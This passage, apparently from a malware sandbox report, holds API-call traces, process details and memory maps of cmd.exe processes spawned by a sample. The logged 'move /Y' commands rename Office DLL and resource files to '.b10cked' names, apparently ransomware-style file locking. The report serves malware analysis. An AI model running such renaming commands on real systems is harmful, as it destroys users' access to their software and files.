lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.194] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0156.194] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0156.194] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0156.194] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0156.194] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0156.194] _wcsicmp (_String1="move", _String2="CD") returned 10 [0156.194] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0156.194] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="REN") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0156.194] _wcsicmp (_String1="move", _String2="SET") returned -6 [0156.194] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0156.194] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0156.194] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0156.194] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0156.194] _wcsicmp (_String1="move", _String2="MD") returned 11 [0156.194] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0156.194] _wcsicmp (_String1="move", _String2="RD") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0156.194] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0156.194] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0156.195] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0156.195] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0156.195] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0156.195] _wcsicmp (_String1="move", _String2="VER") returned -9 [0156.195] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0156.195] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0156.195] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0156.195] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0156.195] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0156.195] _wcsicmp (_String1="move", _String2="START") returned -6 [0156.195] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0156.195] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0156.195] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0156.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.197] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f18c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f184, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f184*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.197] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0156.197] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0156.197] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0156.199] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0156.199] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0156.199] _wcsicmp 
(_String1="ONINTL~2.TRX", _String2="..") returned 65 [0156.199] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~2.trx")) returned 0x2020 [0156.199] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x211f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.199] SetErrorMode (uMode=0x0) returned 0x0 [0156.199] SetErrorMode (uMode=0x1) returned 0x0 [0156.199] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18eb14, lpFilePart=0x18eafc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", lpFilePart=0x18eafc*="ONINTL~2.TRX") returned 0x3c [0156.199] SetErrorMode (uMode=0x0) returned 0x1 [0156.199] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0156.200] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0156.200] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0156.200] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~2.trx")) returned 0x2020 [0156.200] SetErrorMode (uMode=0x0) returned 0x0 [0156.200] SetErrorMode (uMode=0x1) returned 0x0 [0156.200] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18ef90, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", lpFilePart=0x18ed28*="ONINTL~2.TRX") returned 0x3c [0156.200] SetErrorMode (uMode=0x0) returned 0x1 [0156.200] SetErrorMode (uMode=0x0) returned 0x0 [0156.200] SetErrorMode (uMode=0x1) returned 0x0 [0156.200] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f198, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x18ed28*="ONINTL.REST.trx_dll.b10cked") returned 0x4b [0156.200] SetErrorMode (uMode=0x0) returned 0x1 [0156.200] SetLastError (dwErrCode=0x0) [0156.200] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll.b10cked")) returned 0xffffffff [0156.200] GetLastError () returned 0x2 [0156.200] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e6a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6a4) returned 0x212130 [0156.201] FindNextFileW (in: hFindFile=0x212130, lpFindFileData=0x18e6a4 | out: lpFindFileData=0x18e6a4) returned 0 [0156.202] GetLastError () returned 0x12 [0156.202] FindClose (in: hFindFile=0x212130 | out: hFindFile=0x212130) returned 1 [0156.204] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x211cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x211cc0) returned 0x212130 [0156.204] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0156.204] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0156.204] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll")) returned 0x2020 [0156.204] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0156.207] FindClose (in: hFindFile=0x212130 | out: hFindFile=0x212130) returned 1 [0156.207] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8f0 | out: _Buffer=" 1") returned 9 [0156.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.207] GetFileType (hFile=0x7) returned 0x2 [0156.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0156.208] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e87c | out: lpMode=0x18e87c) returned 1 [0156.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8b0 | out: lpConsoleScreenBufferInfo=0x18e8b0) returned 1 [0156.209] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0156.209] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e8f0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0156.209] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x18e8d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8d4*=0x1a) returned 1 [0156.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.209] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.210] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.210] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.210] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.210] SetConsoleInputExeNameW () returned 0x1 [0156.210] GetConsoleOutputCP () returned 0x1b5 [0156.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.210] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.210] exit (_Code=0) Process: id = "260" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21551 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21552 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21553 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21554 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 21555 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21556 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21557 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21558 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21559 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21560 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21571 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21572 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21573 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21574 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 21575 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 21576 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21577 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21578 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21579 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21580 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21581 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21582 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21583 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21584 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21585 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21586 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21587 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21588 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 21589 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21590 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 21591 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21592 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 21593 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 21594 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000001160000" filename = "" Thread: id = 323 os_tid = 0x514 [0156.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc04 | out: lpSystemTimeAsFileTime=0x28fc04*(dwLowDateTime=0x97409dc0, dwHighDateTime=0x1d440a9)) [0156.558] GetCurrentProcessId () returned 0xd48 [0156.558] GetCurrentThreadId () returned 0x514 [0156.558] GetTickCount () returned 0x3007c [0156.558] QueryPerformanceCounter (in: lpPerformanceCount=0x28fbfc | out: lpPerformanceCount=0x28fbfc*=21334741126) returned 1 [0156.559] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0156.559] __set_app_type (_Type=0x1) [0156.559] __p__fmode () returned 0x76b331f4 [0156.559] __p__commode () returned 0x76b331fc [0156.559] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0156.559] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0156.559] GetCurrentThreadId () returned 0x514 [0156.559] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x514) returned 0x38 [0156.559] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.559] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0156.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.559] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0156.559] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fb94 | out: phkResult=0x28fb94*=0x0) returned 0x2 [0156.560] VirtualQuery (in: lpAddress=0x28fbcb, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: 
lpAddress=0x190000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0156.560] GetConsoleOutputCP () returned 0x1b5 [0156.560] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.560] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0156.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.560] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0156.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.560] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.560] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.560] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.560] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.561] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.561] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0156.561] GetEnvironmentStringsW () returned 0x300210* [0156.561] 
FreeEnvironmentStringsW (penv=0x300210) returned 1 [0156.561] GetEnvironmentStringsW () returned 0x300210* [0156.561] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0156.561] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb04 | out: phkResult=0x28eb04*=0x40) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0xa0, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x0, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, 
